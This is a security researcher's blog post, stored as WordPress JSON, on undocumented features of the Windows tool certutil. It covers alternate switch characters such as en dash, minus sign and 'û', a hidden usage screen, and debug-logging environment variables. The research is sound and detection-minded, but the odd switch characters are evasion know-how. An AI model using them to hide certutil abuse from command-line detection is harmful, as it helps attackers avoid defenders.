{"id":7428,"date":"2020-08-30T23:43:33","date_gmt":"2020-08-30T23:43:33","guid":{"rendered":"https:\/\/www.hexacorn.com\/blog\/?p=7428"},"modified":"2020-08-31T22:35:10","modified_gmt":"2020-08-31T22:35:10","slug":"certulitis-one-tool-that-keeps-on-giving","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2020\/08\/30\/certulitis-one-tool-that-keeps-on-giving\/","title":{"rendered":"Certulitis &#8211; one tool that keeps on giving"},"content":{"rendered":"\n<p><strong>Update<\/strong><\/p>\n\n\n\n<p>EC who is one of the most technical guys I know pinged me because he figured out the meaning of that 0x00FB switch, The idea behind it is Windows archeology at its best and it goes as follows:<\/p>\n\n\n\n<p>The code page your windows terminal uses is 437. Endash (&#8216;\u2013&#8217;) is an ASCII character 150 (0x96). When this character is inputted on terminal using code page 437 it will be mapped to &#8216;\u00fb&#8217; which is code 0xFB.<\/p>\n\n\n\n<p>How to use it with certutil?<\/p>\n\n\n\n<p>You can run:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil ALT+150&lt;command of your choice><\/pre>\n\n\n\n<p><strong>Old Post<\/strong><\/p>\n\n\n\n<p>Certutil is a really <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/08\/23\/certutil-one-more-gui-lolbin\/\">naughty<\/a> tool. It accepts lots of various command line arguments that I believe are not widely known &#8211; and this post (and maybe some follow-up posts) is hoping to change that.<\/p>\n\n\n\n<p>One of the first things I caught when I started analysing its command line arguments was the mysterious, case-insensitive command line argument comparison with the &#8216;uSAGE&#8217; string. It turns out that certutil offers two different usage information depending on a command line option. If you just use &#8216;?&#8217; then it&#8217;s the &#8216;official&#8217; version. If it&#8217;s &#8216;uSAGE&#8217; then it&#8217;s the unofficial one. Of course, once I found out I ran into Google and Twitter to find out if it is IN THE KNOWN. <\/p>\n\n\n\n<p>Yes, it was. <a href=\"https:\/\/twitter.com\/0gtweet\">@0gtweet<\/a> did it my favourite way &#8211; the <a href=\"https:\/\/twitter.com\/0gtweet\/status\/1236960061873967104?s=20\">hard way<\/a> :-), <a href=\"https:\/\/twitter.com\/dunarth\/status\/1237151141634293760?s=20\">@dunarth<\/a> did it the right way, and <a href=\"https:\/\/twitter.com\/chris_ayres\">@chris_ayres<\/a> did it the <a href=\"https:\/\/twitter.com\/chris_ayres\/status\/1045032036971556864?s=20\">earliest<\/a> way (AFAICT).<\/p>\n\n\n\n<p>Okay, with this out of the way, we look at the actual command line arguments.<\/p>\n\n\n\n<p>Wait. What about the command line switches? Similarly to PowerShell, certutil accepts command line arguments using a number of different characters:<\/p>\n\n\n\n<ul><li>\/ (Unicode 0x002F)<\/li><li>&#8211; (Unicode 0x002D)<\/li><li><strong>\u2013<\/strong> (Unicode 0x2013)<\/li><li><strong><strong>\u2212<\/strong><\/strong> (Unicode 0x2212)<\/li><li>? (Unicode 0x00FB)<\/li><\/ul>\n\n\n\n<p>I still can&#8217;t figure out why the last Unicode character on that list is being accepted. The Unicode character 0x00FB is &#8216;\u00fb&#8217;. If you know, please let me know and I will update the post.<\/p>\n\n\n\n<p>Another discovery is brought to us by two unusual environment variables:<\/p>\n\n\n\n<ul><li>certsrv_rawhex &#8211; shows stuff in raw hex (e.g. certs)<\/li><li>CertSrv_Chain &#8211; enables debugging information being available for cert chain<\/li><li>CERTSRV_LOGMAX &#8211; maximum length of the certutil.log file<\/li><li>CERTSRV_DEBUG &#8211; enables certutil debug mode<\/li><li>CERTSRV_LOGFILE &#8211; name of the log file<\/li><\/ul>\n\n\n\n<p>The &#8216;certutil.log&#8217; file is a log file that is created if DbgIsSSActive function imported from &#8216;certcli.dll&#8217; which forwards it to &#8216;certca.dll&#8217; returns true. I am kidding, it&#8217;s a convoluted way to say that certain conditions need to be met for the &#8216;certutil.log&#8217; to be created, They can be either set via Registry (HKLM\\Software\\Microsoft\\Cryptography\\AutoEnrollment\\Debug=XXX OR HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\Debug=XXX), or via environment variables listed below.<\/p>\n\n\n\n<p>In fact, setting <\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">set CERTSRV_LOGFILE=c:\\test\\foo.log<br>set CERTSRV_DEBUG=0xFFFFFFFF<\/pre>\n\n\n\n<p>will enable full logging to your main console and to the file c:\\test\\foo.log.<\/p>\n\n\n\n<p>Pick up your favorite certutil command and give it a go. You will like the output as it helps to troubleshoot your manual testing \ud83d\ude42<\/p>\n\n\n\n<p>Finally, while certutil is primarily a command line application, it does create a windows called &#8216;CertUtil Application&#8217; of class &#8216;CertUtil&#8217;, and apart from it, provides a UI for some of its commands (e..g <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/08\/23\/certutil-one-more-gui-lolbin\/\">-URL<\/a>).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Update EC who is one of the most technical guys I know pinged me because he figured out the meaning of that 0x00FB switch, The idea behind it is Windows archeology at its best and it goes as follows: The &hellip; <a href=\"https:\/\/www.hexacorn.com\/blog\/2020\/08\/30\/certulitis-one-tool-that-keeps-on-giving\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[53,67],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/7428"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=7428"}],"version-history":[{"count":7,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/7428\/revisions"}],"predecessor-version":[{"id":7437,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/7428\/revisions\/7437"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=7428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=7428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=7428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}